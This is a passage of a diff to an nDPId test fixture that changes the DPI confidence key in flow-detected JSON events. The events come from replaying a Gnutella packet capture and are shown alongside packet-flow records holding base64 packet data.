FLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 
01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":2,"flow_last_seen":90452,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90452,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0YAAEAR+vI88TDCCgACD1M1cAkC31EXqc0xAhWpgpzJQk2EqzRt70QAAMACAAAGR1RLRwAAGN\/m\/5SuT3RX9Y8zGKdBIhyITj8EPPEwwlM1AQAAAASjKCcfFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 
@@ -902,52 +902,52 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":859,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":1,"flow_last_seen":90747,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":90747,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0eN9AAIAGqLsKAAIPM0SZ1sSTZo3Cj79BAAAAAIAC+vDuAwAAAgQFtAEDAwgBAQQC"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":860,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":2,"flow_last_seen":90760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90760,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0kAAEAGeoC8PTS3CgACDy5MxHwAp\/gBiFqWg2AS\/\/+QwwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_packet_id":3,"flow_last_seen":90760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90760,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoc0ZAAIAGioYKAAIPvD00t8R8LkyIWpaDAKf4AlAQ+vCtjwAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":862,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90742,"flow_last_seen":90763,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90763,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":50300,"dst_port":11852,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0sAAEAGN+GOhKUNCgACD3dmxIwAqPIB4YpKRGAS\/\/\/+CQAAAgQFtA=="} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":90767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90767,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA0wAAEAGSwNNOtM0CgACDw7exHgAqewBNESdzWAS\/\/\/ZhQAAAgQFtA=="} 
00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":866,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_packet_id":3,"flow_last_seen":90767,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90767,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxkxAAIAG9OIKAAIPjoSlDcSMd2bhikpEAKjyAlAQ+vAa1gAA"} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":867,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":90768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90768,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoHOhAAIAGsWoKAAIPTTrTNMR4Dt40RJ3NAKnsAlAQ+vD2UQAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":868,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90768,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":870,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":2,"flow_last_seen":90768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90768,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA04AAEAG9E3Co7R+CgACDypJxJAAquYBYmFhZWAS\/\/97mQAAAgQFtA=="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":871,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90771,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoSs1AAIAGLNIKAAIPwqO0fsSQKkliYWFlAKrmAlAQ+vCYZQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1AAAEAGZwW5u0qtCgACD9DxxI8Aq+ABnMSfU2AS\/\/\/VWAAAAgQFtA=="} 
00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":2,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90772,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1EAAEAG4wi8pcu+CgACD1XrxI0ArNoBciGOTGAS\/\/8ODwAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoOIRAAIAGsdQKAAIPubtKrcSP0PGcxJ9TAKvgAlAQ+vDyJAAA"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":877,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_packet_id":3,"flow_last_seen":90772,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90772,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoxP5AAIAGoV4KAAIPvKXLvsSNVetyIY5MAKzaAlAQ+vAq2wAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90772,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90772,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1UAAEAGyRlYeEnXCgACD1\/yxH8ArdQBY7MtEWAS\/\/9f0wAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1YAAEAGK3HBIH7WCgACD+jMxI4Ars4ByU6XnmAS\/\/9vGAAAAgQFtA=="} 
00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo+\/1AAIAGUHQKAAIPWHhJ18R\/X\/Jjsy0RAK3UAlAQ+vB8nwAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":2,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90776,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA1cAAEAGVX5o7qz6CgACD1v8xIgAr8gBAIGaT2AS\/\/\/yGAAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_packet_id":3,"flow_last_seen":90776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90776,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoYpBAAIAGTDoKAAIPwSB+1sSO6MzJTpeeAK7OAlAQ+vCL5AAA"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":889,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90776,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_packet_id":3,"flow_last_seen":90777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90777,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoBk9AAIAG0okKAAIPaO6s+sSIW\/wAgZpPAK\/IAlAQ+vAO5QAA"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":892,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA14AAEAG805VqCJpCgACD5vkxIAAsMIB8fB5WWAS\/\/+FlQAAAgQFtA=="} 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA18AAEAG3PlXezbqCgACD9NyxH0AsbwBqI15YWAS\/\/+HEAAAAgQFtA=="} 
